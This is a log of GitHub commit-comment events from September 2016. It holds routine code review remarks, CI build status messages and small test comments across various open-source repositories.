{"id":"4589196487","type":"CommitCommentEvent","actor":{"login":"procedurepeng"},"repo":{"name":"Team-FreeDom/-"},"payload":{"comment":{"id":19094942,"position":null,"line":null,"path":null,"commit_id":"a58d5d9033d069055bcd63db30059edb1d9d0c62","created_at":"2016-09-20T12:03:20Z","updated_at":"2016-09-20T12:03:20Z","body":"此项目是基于原型设计工具Axure进行的案例实践"}},"created_at":"2016-09-20T12:03:20Z"}
{"id":"4589199594","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19094944,"position":5,"line":0,"path":"core/reflection.jvm/src/kotlin/reflect/jvm/internal/FunctionCaller.kt","commit_id":"e7e54d571f49ddc0af2c0ca069ac1e52a8e7d676","created_at":"2016-09-20T12:03:45Z","updated_at":"2016-09-20T12:03:45Z","body":"I'd split this class into FunctionCaller and FunctionCallerWithMember or something like this"}},"created_at":"2016-09-20T12:03:45Z"}
{"id":"4589201649","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19094948,"position":null,"line":null,"path":null,"commit_id":"6f40719297a4d9405aa0e087754ef62cfab5a38c","created_at":"2016-09-20T12:04:10Z","updated_at":"2016-09-20T12:04:10Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1061](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13618&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T12:04:10Z"}
{"id":"4589201967","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19094950,"position":null,"line":null,"path":null,"commit_id":"fba726ae0206c010a97cf48f8e3ebfc182a6a6ac","created_at":"2016-09-20T12:04:14Z","updated_at":"2016-09-20T12:04:14Z","body":"Initial commit."}},"created_at":"2016-09-20T12:04:14Z"}
{"id":"4589202122","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19094951,"position":null,"line":null,"path":null,"commit_id":"cafa3fca5889e3345ac4a311ea49c662a2c9c07a","created_at":"2016-09-20T12:04:16Z","updated_at":"2016-09-20T12:04:16Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1062](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13616&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T12:04:16Z"}
{"id":"4589202775","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19094955,"position":null,"line":null,"path":null,"commit_id":"cafa3fca5889e3345ac4a311ea49c662a2c9c07a","created_at":"2016-09-20T12:04:25Z","updated_at":"2016-09-20T12:04:25Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1063](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13619&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-20T12:04:25Z"}
{"id":"4589204936","type":"CommitCommentEvent","actor":{"login":"yogev-stratoscale"},"repo":{"name":"Stratoscale/kubernetes-contrib"},"payload":{"comment":{"id":19094960,"position":null,"line":null,"path":null,"commit_id":"6f393749a1d2356f0bacb36dac9c622327b94e3f","created_at":"2016-09-20T12:04:56Z","updated_at":"2016-09-20T12:04:56Z","body":"@shay-stratoscale, @ravid-stratoscale"}},"created_at":"2016-09-20T12:04:56Z"}
{"id":"4589205154","type":"CommitCommentEvent","actor":{"login":"silasdavis"},"repo":{"name":"eris-ltd/eris-db"},"payload":{"comment":{"id":19094961,"position":null,"line":null,"path":null,"commit_id":"62a8d74487b34ab968346d40cbd8406697a6ed5c","created_at":"2016-09-20T12:04:59Z","updated_at":"2016-09-20T12:04:59Z","body":"oh obviously we have this change but this commit has been left dangling as unmerged, will remove branch"}},"created_at":"2016-09-20T12:04:59Z"}
{"id":"4589206557","type":"CommitCommentEvent","actor":{"login":"Killian0408"},"repo":{"name":"Killian0408/Python"},"payload":{"comment":{"id":19094964,"position":null,"line":null,"path":null,"commit_id":"7fd9397325a381e18b67032fcf164bf95c81e291","created_at":"2016-09-20T12:05:19Z","updated_at":"2016-09-20T12:05:19Z","body":"ASCII"}},"created_at":"2016-09-20T12:05:19Z"}
{"id":"4589207775","type":"CommitCommentEvent","actor":{"login":"enjoy-digital"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":19094966,"position":null,"line":null,"path":null,"commit_id":"2011a5f243d1b187420d17f5cceb8893790c5b16","created_at":"2016-09-20T12:05:35Z","updated_at":"2016-09-20T12:05:35Z","body":"We could have a generator that run at higher frequency, that inserts some dead cycles at some points, but still meet the average bandwidth.\r\nBut I see your point and that's probably better to handle that outside (because we would also need to report FIFO empty situations). So I'll use the clock domain of the first phy for the transport layer and elastic buffers between transport and the others links/phys."}},"created_at":"2016-09-20T12:05:35Z"}
{"id":"4589209415","type":"CommitCommentEvent","actor":{"login":"ja0n"},"repo":{"name":"St4rk/nightmare-fiction"},"payload":{"comment":{"id":19094971,"position":94,"line":76,"path":"game/mainmenu/mainMenu.cpp","commit_id":"5d27378eb243762efecc69f3eb45d9fcd9d0b883","created_at":"2016-09-20T12:05:56Z","updated_at":"2016-09-20T12:05:56Z","body":"GAMA -> typo?"}},"created_at":"2016-09-20T12:05:56Z"}
{"id":"4589211581","type":"CommitCommentEvent","actor":{"login":"jpfr"},"repo":{"name":"open62541/open62541"},"payload":{"comment":{"id":19094977,"position":31,"line":508,"path":"src/server/ua_services_nodemanagement.c","commit_id":"36f430eaccf3cc775f990c86b1d2b5f44dc2af00","created_at":"2016-09-20T12:06:25Z","updated_at":"2016-09-20T12:06:25Z","body":"Hey @ichrispa ,\r\n\r\ncan you give an example for a vartypenode that really is a datatype?\r\nI will stop nagging with an example.\r\nBut that would mean that ns0 is violating the rule that every variable needs exactly one hastypedef reference to a variabletype."}},"created_at":"2016-09-20T12:06:25Z"}
{"id":"4589211741","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":19094978,"position":null,"line":null,"path":null,"commit_id":"9549ac897cfaace21617375de8460c35c617f01d","created_at":"2016-09-20T12:06:27Z","updated_at":"2016-09-20T12:06:27Z","body":"I thought so....\r\nThe typical case I take care with this patch is \r\nKe1 e2 f3 g2 Black e4 Ne5 Re8 with 2 aligned blockers, one black, one white.\r\nIf the see square is f3, and black to move,\r\nthe see sequence will be .exf3 gxf3 Nxf3 and it stops there \r\n\r\nBut now I realise that iafter a simple disco check,, SEE should stop right away. in most cases, unless the king can capture the disco-blocker which just moved\r\n\r\nexample: White Rg1 Bg2 Black Kg8 Rf8 see square f3, white to move\r\ng2-f3 and the see sequence cannot continue on the f3 square\r\n\r\nexample: White Rg1 Bg7 Black Kg8 Re8, see square f8, white to move\r\ng7-f8 and in a see sequence, the only move would be Kf8 (if legal)\r\n\r\n"}},"created_at":"2016-09-20T12:06:27Z"}
{"id":"4589214866","type":"CommitCommentEvent","actor":{"login":"aymericdamiensc"},"repo":{"name":"tflearn/tflearn"},"payload":{"comment":{"id":19094985,"position":null,"line":null,"path":null,"commit_id":"3c025bee4e31226b6c2fd650b8c2338a38fc9e53","created_at":"2016-09-20T12:07:11Z","updated_at":"2016-09-20T12:07:11Z","body":"@ilaripih It should be working back. an exception will be raised when targets are actually used but not provided."}},"created_at":"2016-09-20T12:07:11Z"}
{"id":"4589215252","type":"CommitCommentEvent","actor":{"login":"tianyu52"},"repo":{"name":"tianyu52/tzy"},"payload":{"comment":{"id":19094988,"position":null,"line":null,"path":null,"commit_id":"884a4c35624ebdcd6a5d9a5748189e558fc8a713","created_at":"2016-09-20T12:07:16Z","updated_at":"2016-09-20T12:07:16Z","body":"11111"}},"created_at":"2016-09-20T12:07:16Z"}
{"id":"4589216092","type":"CommitCommentEvent","actor":{"login":"srowen"},"repo":{"name":"apache/spark"},"payload":{"comment":{"id":19094991,"position":null,"line":null,"path":null,"commit_id":"f039d964d152c0aeb5b71eb5188a9a7fd4b5aef3","created_at":"2016-09-20T12:07:27Z","updated_at":"2016-09-20T12:07:27Z","body":"@cloud-fan I think this needs to be reverted in branch-2.0 as well, because the tests there are still failing."}},"created_at":"2016-09-20T12:07:27Z"}
{"id":"4589218033","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":19094995,"position":null,"line":null,"path":null,"commit_id":"2011a5f243d1b187420d17f5cceb8893790c5b16","created_at":"2016-09-20T12:07:54Z","updated_at":"2016-09-20T12:07:54Z","body":"312MHz is already pushing those sluggish FPGAs, and the additional flow control signals may actually slow things down further."}},"created_at":"2016-09-20T12:07:54Z"}
{"id":"4589219615","type":"CommitCommentEvent","actor":{"login":"aymericdamien"},"repo":{"name":"tflearn/tflearn"},"payload":{"comment":{"id":19095000,"position":null,"line":null,"path":null,"commit_id":"3c025bee4e31226b6c2fd650b8c2338a38fc9e53","created_at":"2016-09-20T12:08:15Z","updated_at":"2016-09-20T12:08:15Z","body":"ops... that is correct, let me remove that part. It should not be mandatory to have target data indeed.."}},"created_at":"2016-09-20T12:08:15Z"}
{"id":"4589219743","type":"CommitCommentEvent","actor":{"login":"simontoens"},"repo":{"name":"emufreak/iAmiga"},"payload":{"comment":{"id":19095001,"position":null,"line":null,"path":null,"commit_id":"c99e911195ee0cf5f571c35ec4407db3ce1880b7","created_at":"2016-09-20T12:08:16Z","updated_at":"2016-09-20T12:08:16Z","body":"@emufreak thanks for the fix - this looks way cleaner now."}},"created_at":"2016-09-20T12:08:16Z"}
{"id":"4589220021","type":"CommitCommentEvent","actor":{"login":"FreeCX"},"repo":{"name":"dead-pine-inc/book-of-the-idea-out"},"payload":{"comment":{"id":19095002,"position":null,"line":null,"path":null,"commit_id":"e0731720a15b5660b00e68c66a161a5c3f95f44f","created_at":"2016-09-20T12:08:20Z","updated_at":"2016-09-20T12:08:20Z","body":"Только твоя пасхалка не даёт собрать pdf)"}},"created_at":"2016-09-20T12:08:20Z"}
{"id":"4589223320","type":"CommitCommentEvent","actor":{"login":"LimGiRyong"},"repo":{"name":"jeahun/opensource"},"payload":{"comment":{"id":19095008,"position":null,"line":null,"path":null,"commit_id":"010dfabfccedd50ec8225ad27adf73af88252fff","created_at":"2016-09-20T12:09:04Z","updated_at":"2016-09-20T12:09:04Z","body":"http://shop.adidas.co.kr/index_preApply.html?pn=s16yeezy09"}},"created_at":"2016-09-20T12:09:04Z"}
{"id":"4589225438","type":"CommitCommentEvent","actor":{"login":"aymericdamien"},"repo":{"name":"tflearn/tflearn"},"payload":{"comment":{"id":19095014,"position":null,"line":null,"path":null,"commit_id":"3c025bee4e31226b6c2fd650b8c2338a38fc9e53","created_at":"2016-09-20T12:09:31Z","updated_at":"2016-09-20T12:09:31Z","body":"@ilaripih It should be working again. An exception will be raised when targets are actually used but not provided."}},"created_at":"2016-09-20T12:09:31Z"}
{"id":"4589229091","type":"CommitCommentEvent","actor":{"login":"orsjb"},"repo":{"name":"orsjb/beads"},"payload":{"comment":{"id":19095023,"position":40,"line":40,"path":"src/beads_main/net/beadsproject/beads/ugens/ADSR.java","commit_id":"f174fee8bc49823f0867884a2fd6d19a586f7829","created_at":"2016-09-20T12:10:20Z","updated_at":"2016-09-20T12:10:20Z","body":"Yes it definitely should be! Correcting now.\n\n> On 20 Sep 2016, at 4:40 PM, chadawagner <notifications@github.com> wrote:\n> \n> should this be env.addSegment(adsr[i], adsr[i+1]); ??\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/orsjb/beads/commit/f174fee8bc49823f0867884a2fd6d19a586f7829#commitcomment-19091375>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AABsIpLRlTIhpselzT9YxOeCZbJCyC2Zks5qr3_fgaJpZM4KBRmx>.\n> \n\n"}},"created_at":"2016-09-20T12:10:20Z"}
{"id":"4589229964","type":"CommitCommentEvent","actor":{"login":"kevin01222"},"repo":{"name":"kevin01222/javaEE"},"payload":{"comment":{"id":19095029,"position":1,"line":1,"path":"README.md","commit_id":"fd1cfa1fef94f856ef08efd5cb7365bbf81fb512","created_at":"2016-09-20T12:10:31Z","updated_at":"2016-09-20T12:10:31Z","body":"## test ##"}},"created_at":"2016-09-20T12:10:31Z"}
{"id":"4589235564","type":"CommitCommentEvent","actor":{"login":"ilaripih"},"repo":{"name":"tflearn/tflearn"},"payload":{"comment":{"id":19095043,"position":null,"line":null,"path":null,"commit_id":"3c025bee4e31226b6c2fd650b8c2338a38fc9e53","created_at":"2016-09-20T12:11:48Z","updated_at":"2016-09-20T12:11:48Z","body":"@aymericdamien Thanks a lot for the quick fix!"}},"created_at":"2016-09-20T12:11:48Z"}
{"id":"4589237818","type":"CommitCommentEvent","actor":{"login":"dzharkov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19095047,"position":38,"line":0,"path":"core/reflection.jvm/src/kotlin/reflect/jvm/internal/KCallableImpl.kt","commit_id":"e7e54d571f49ddc0af2c0ca069ac1e52a8e7d676","created_at":"2016-09-20T12:12:19Z","updated_at":"2016-09-20T12:12:19Z","body":"Why do we use `defaultCaller` and it's interface here?\n\nOne may just call `createAnnotationInstance` here without retrieving arguments from the map and then putting them back again"}},"created_at":"2016-09-20T12:12:19Z"}
{"id":"4589237852","type":"CommitCommentEvent","actor":{"login":"peterkohaut"},"repo":{"name":"peterkohaut/scummvm"},"payload":{"comment":{"id":19095048,"position":18,"line":65,"path":"engines/bladerunner/view.cpp","commit_id":"6ecd44bb49bf9a6fc507be0f0918411784e60a53","created_at":"2016-09-20T12:12:19Z","updated_at":"2016-09-20T12:12:19Z","body":"i'm sorry, i'm using resharper to format all the code... :)"}},"created_at":"2016-09-20T12:12:19Z"}
{"id":"4589238800","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19095051,"position":null,"line":null,"path":null,"commit_id":"6f40719297a4d9405aa0e087754ef62cfab5a38c","created_at":"2016-09-20T12:12:32Z","updated_at":"2016-09-20T12:12:32Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1061](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13618&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 215, ignored: 3 Build time: 00:08:22\n### Failed tests\n```\norg.genivi.sota.device_registry.DeviceResourceSpec.GET request with ?regex yields devices which match the regex.: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-20T12:12:32Z"}
{"id":"4589239259","type":"CommitCommentEvent","actor":{"login":"mashraff"},"repo":{"name":"aspnetboilerplate/aspnetboilerplate"},"payload":{"comment":{"id":19095053,"position":null,"line":null,"path":null,"commit_id":"ff8f234752702388aa600ff067269fa74cb6a59a","created_at":"2016-09-20T12:12:39Z","updated_at":"2016-09-20T12:12:39Z","body":"@hikalkan, this looks very nice. Much better than my attempt. Thank you for all the hard work."}},"created_at":"2016-09-20T12:12:39Z"}
{"id":"4589239848","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19095056,"position":null,"line":null,"path":null,"commit_id":"cafa3fca5889e3345ac4a311ea49c662a2c9c07a","created_at":"2016-09-20T12:12:47Z","updated_at":"2016-09-20T12:12:47Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1063](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13619&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 240, ignored: 3 Build time: 00:08:21"}},"created_at":"2016-09-20T12:12:47Z"}
{"id":"4589241745","type":"CommitCommentEvent","actor":{"login":"seav"},"repo":{"name":"Cadasta/cadasta-platform"},"payload":{"comment":{"id":19095059,"position":5,"line":269,"path":"cadasta/organization/forms.py","commit_id":"d5ae6a2c444bb01ac94cb658dde4de2f74d8814d","created_at":"2016-09-20T12:13:15Z","updated_at":"2016-09-20T12:13:15Z","body":"When you have `filter()` here, `all()` is no longer needed. I'll modify this in my #445 resolution."}},"created_at":"2016-09-20T12:13:15Z"}
{"id":"4589241953","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19095060,"position":null,"line":null,"path":null,"commit_id":"cafa3fca5889e3345ac4a311ea49c662a2c9c07a","created_at":"2016-09-20T12:13:18Z","updated_at":"2016-09-20T12:13:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1062](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13616&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 216, ignored: 3 Build time: 00:09:02\n### Failed tests\n```\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.marks reported packages as installed: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-20T12:13:18Z"}
{"id":"4589243756","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19095063,"position":81,"line":398,"path":"src/FffGcodeWriter.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-20T12:13:39Z","updated_at":"2016-09-20T12:13:39Z","body":"Negative layer_number means raft, not post-raft."}},"created_at":"2016-09-20T12:13:39Z"}
{"id":"4589244796","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19095066,"position":null,"line":null,"path":null,"commit_id":"4eede7cd1ba1bbdbba398e2faee132909e72273d","created_at":"2016-09-20T12:13:54Z","updated_at":"2016-09-20T12:13:54Z","body":"Initial commit."}},"created_at":"2016-09-20T12:13:54Z"}
{"id":"4589250887","type":"CommitCommentEvent","actor":{"login":"enjoy-digital"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":19095075,"position":null,"line":null,"path":null,"commit_id":"2011a5f243d1b187420d17f5cceb8893790c5b16","created_at":"2016-09-20T12:15:14Z","updated_at":"2016-09-20T12:15:14Z","body":"I see, the first P&Rs seems OK on timings. If we have timing issues, I'll remove the flow control part, but for now it still seems interesting since you can prepare the data in advance and just release the stream when receiving the SYNC signal."}},"created_at":"2016-09-20T12:15:14Z"}
{"id":"4589250919","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19095076,"position":null,"line":null,"path":null,"commit_id":"35e346a6a971617df4527d0b7829cef8bf2bb340","created_at":"2016-09-20T12:15:14Z","updated_at":"2016-09-20T12:15:14Z","body":"Initial commit."}},"created_at":"2016-09-20T12:15:14Z"}
{"id":"4589253279","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19095081,"position":84,"line":401,"path":"src/FffGcodeWriter.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-20T12:15:44Z","updated_at":"2016-09-20T12:15:44Z","body":"These could be made constant. `layer_thickness` also.\r\n\r\n(Not blocking.)"}},"created_at":"2016-09-20T12:15:44Z"}
{"id":"4589255201","type":"CommitCommentEvent","actor":{"login":"seav"},"repo":{"name":"Cadasta/cadasta-platform"},"payload":{"comment":{"id":19095085,"position":1,"line":266,"path":"cadasta/organization/forms.py","commit_id":"d5ae6a2c444bb01ac94cb658dde4de2f74d8814d","created_at":"2016-09-20T12:16:10Z","updated_at":"2016-09-20T12:16:10Z","body":"@linzjax, is there a reason why `.filter(archived=False)` was not added here too, similar to the one you added in the `else` clause? Not adding the filter means that superusers can add projects to archived organizations."}},"created_at":"2016-09-20T12:16:10Z"}
{"id":"4589255930","type":"CommitCommentEvent","actor":{"login":"sbourdeauducq"},"repo":{"name":"enjoy-digital/litejesd204b"},"payload":{"comment":{"id":19095089,"position":null,"line":null,"path":null,"commit_id":"2011a5f243d1b187420d17f5cceb8893790c5b16","created_at":"2016-09-20T12:16:18Z","updated_at":"2016-09-20T12:16:18Z","body":"Flow control is definitely not welcome. What would be more useful is handling divided (phase-aligned) clocks at the elastic buffer, but if you have complex layers on top it may be preferable to do that externally, where we send samples into the JESD core. @jordens what is the phaser target clock frequency?"}},"created_at":"2016-09-20T12:16:18Z"}
{"id":"4589258604","type":"CommitCommentEvent","actor":{"login":"flovilmart"},"repo":{"name":"ParsePlatform/parse-server"},"payload":{"comment":{"id":19095092,"position":null,"line":null,"path":null,"commit_id":"cb7b54941b2b6953d96a3ca4223efc0961b9e636","created_at":"2016-09-20T12:16:53Z","updated_at":"2016-09-20T12:16:53Z","body":"@zingano you can enable by setting PARSE_SERVER_ENABLE_EXPERIMENTAL_DIRECT_ACCESS=1 in your environment before starting Parse-server"}},"created_at":"2016-09-20T12:16:53Z"}
{"id":"4589258635","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron-squirrel-startup"},"payload":{"comment":{"id":19095093,"position":5,"line":21,"path":"index.js","commit_id":"57abcf2399bc06c2524929397be54e183178fed5","created_at":"2016-09-20T12:16:54Z","updated_at":"2016-09-20T12:16:54Z","body":"wouldn't we want the change only for --squirrel-updated?"}},"created_at":"2016-09-20T12:16:54Z"}
{"id":"4589259472","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19095096,"position":124,"line":461,"path":"src/FffGcodeWriter.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-20T12:17:06Z","updated_at":"2016-09-20T12:17:06Z","body":"This processes the ooze shield, support and draft shield multiple times for layer 0. Isn't it better to do `if (layer_nr >= 0)`?"}},"created_at":"2016-09-20T12:17:06Z"}
{"id":"4589261976","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron-squirrel-startup"},"payload":{"comment":{"id":19095101,"position":null,"line":null,"path":null,"commit_id":"28b98afda94cce3e47025858cba0b400202208da","created_at":"2016-09-20T12:17:37Z","updated_at":"2016-09-20T12:17:37Z","body":"ah I see. :)"}},"created_at":"2016-09-20T12:17:37Z"}
{"id":"4589262302","type":"CommitCommentEvent","actor":{"login":"elpaso"},"repo":{"name":"boundlessgeo/qgis-plugin-template"},"payload":{"comment":{"id":19095103,"position":33,"line":33,"path":"pavement.py","commit_id":"712640bb86f66b3d7be287863e54e4d8651f0633","created_at":"2016-09-20T12:17:42Z","updated_at":"2016-09-20T12:17:42Z","body":"@volaya  do we still need this? If we want to upload to our BL server we don't use RPC2, if we want to upload to qgis official repo the address is wrong."}},"created_at":"2016-09-20T12:17:42Z"}
{"id":"4589262329","type":"CommitCommentEvent","actor":{"login":"daren-thomas"},"repo":{"name":"architecture-building-systems/CEAforArcGIS"},"payload":{"comment":{"id":19095104,"position":4,"line":73,"path":"cea/resources/radiation.py","commit_id":"a0ef3e8f61ba268ef61fff8a3b4213c1931b9443","created_at":"2016-09-20T12:17:42Z","updated_at":"2016-09-20T12:17:42Z","body":"do we have an epw for brussels? I think that is where we get the other values for latitude and longitude from..."}},"created_at":"2016-09-20T12:17:42Z"}
{"id":"4589262348","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/electron-squirrel-startup"},"payload":{"comment":{"id":19095105,"position":null,"line":null,"path":null,"commit_id":"28b98afda94cce3e47025858cba0b400202208da","created_at":"2016-09-20T12:17:42Z","updated_at":"2016-09-20T12:17:42Z","body":"👍 "}},"created_at":"2016-09-20T12:17:42Z"}
{"id":"4589262634","type":"CommitCommentEvent","actor":{"login":"akalinow"},"repo":{"name":"akalinow/LLRHiggsTauTau"},"payload":{"comment":{"id":19095106,"position":null,"line":null,"path":null,"commit_id":"9d07d4197d78099fc642ff1bb703654bb64d61b5","created_at":"2016-09-20T12:17:46Z","updated_at":"2016-09-20T12:17:46Z","body":"@mbluj @apyskir: another fixes for synchronization."}},"created_at":"2016-09-20T12:17:46Z"}
{"id":"4589263427","type":"CommitCommentEvent","actor":{"login":"caiyudian"},"repo":{"name":"caiyudian/C_cloud"},"payload":{"comment":{"id":19095110,"position":1,"line":1,"path":"README.md","commit_id":"7b57b9c558675b972c533e7ada975ffd5163b857","created_at":"2016-09-20T12:17:56Z","updated_at":"2016-09-20T12:17:56Z","body":"xx\r\n"}},"created_at":"2016-09-20T12:17:56Z"}
{"id":"4589263953","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19095112,"position":null,"line":null,"path":null,"commit_id":"36586f33e906f266bb2b6d0e12b0dcf79757ab0e","created_at":"2016-09-20T12:18:03Z","updated_at":"2016-09-20T12:18:03Z","body":"Initial commit\r\nmoneroj"}},"created_at":"2016-09-20T12:18:03Z"}
{"id":"4589264618","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19095115,"position":165,"line":496,"path":"src/FffGcodeWriter.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-20T12:18:12Z","updated_at":"2016-09-20T12:18:12Z","body":"Again, primt tower is added multiple times to layer 0."}},"created_at":"2016-09-20T12:18:12Z"}
{"id":"4589266741","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19095121,"position":null,"line":null,"path":null,"commit_id":"74999fe02ccbfafb012d30f69caf95ebe1af95bb","created_at":"2016-09-20T12:18:40Z","updated_at":"2016-09-20T12:18:40Z","body":"Initial commit."}},"created_at":"2016-09-20T12:18:40Z"}
{"id":"4589267540","type":"CommitCommentEvent","actor":{"login":"ranglanimanish90"},"repo":{"name":"OfficeDev/Project-REST-Basic-Operations"},"payload":{"comment":{"id":19095124,"position":null,"line":null,"path":null,"commit_id":"022cc2156157ff41450086e1cf5f07b55d6f2a8e","created_at":"2016-09-20T12:18:51Z","updated_at":"2016-09-20T12:18:51Z","body":"Thanks Ryan, that works for us in C#. Can you please try same thing in JavaScript REST API and share working code snippet with me. Thanks.."}},"created_at":"2016-09-20T12:18:51Z"}
{"id":"4589267655","type":"CommitCommentEvent","actor":{"login":"ekg"},"repo":{"name":"vgteam/vg"},"payload":{"comment":{"id":19095125,"position":null,"line":null,"path":null,"commit_id":"8d505a93e40f33c61c10d90a2b6f14541dbf940f","created_at":"2016-09-20T12:18:52Z","updated_at":"2016-09-20T12:18:52Z","body":"@yhoogstrate did you update and test on your build? Could you send a PR with the commit you've bumped to? No worries if not, I'll get to this as soon as I can."}},"created_at":"2016-09-20T12:18:52Z"}
{"id":"4589268238","type":"CommitCommentEvent","actor":{"login":"TheodoraDimitrova"},"repo":{"name":"TheodoraDimitrova/Hello-word"},"payload":{"comment":{"id":19095130,"position":null,"line":null,"path":null,"commit_id":"0ab7d3ed4079a5c21da5c44478979c86362be10a","created_at":"2016-09-20T12:19:01Z","updated_at":"2016-09-20T12:19:01Z","body":"**@******"}},"created_at":"2016-09-20T12:19:01Z"}
{"id":"4589269211","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/windows-installer"},"payload":{"comment":{"id":19095133,"position":null,"line":null,"path":null,"commit_id":"1febf37c0c9fe368895c9a887a3c8f32ef6187ab","created_at":"2016-09-20T12:19:15Z","updated_at":"2016-09-20T12:19:15Z","body":"I don't think you need to move the dev dependencies. "}},"created_at":"2016-09-20T12:19:15Z"}
{"id":"4589271945","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/chromium"},"payload":{"comment":{"id":19095145,"position":null,"line":null,"path":null,"commit_id":"e55183bc71ca76641d098da1df1caa5a7abd37cd","created_at":"2016-09-20T12:19:51Z","updated_at":"2016-09-20T12:19:51Z","body":"++"}},"created_at":"2016-09-20T12:19:51Z"}
{"id":"4589273122","type":"CommitCommentEvent","actor":{"login":"daren-thomas"},"repo":{"name":"architecture-building-systems/CEAforArcGIS"},"payload":{"comment":{"id":19095149,"position":4,"line":73,"path":"cea/resources/radiation.py","commit_id":"a0ef3e8f61ba268ef61fff8a3b4213c1931b9443","created_at":"2016-09-20T12:20:07Z","updated_at":"2016-09-20T12:20:07Z","body":"this kind of *temporary* fix tends to stay in the code base *forever* - would it be possible to just use a branch (e.g. \"brussels-case-study\") and keep that up-to-date with master?"}},"created_at":"2016-09-20T12:20:07Z"}
{"id":"4589273312","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19095150,"position":5,"line":114,"path":"src/sliceDataStorage.cpp","commit_id":"a70fdfb9171a66ca249bb1857b4682078392dc04","created_at":"2016-09-20T12:20:10Z","updated_at":"2016-09-20T12:20:10Z","body":"Ehm, doesn't this make a copy of `sliceDataStorage` before passing it to `getFillerLayerCount`?"}},"created_at":"2016-09-20T12:20:10Z"}
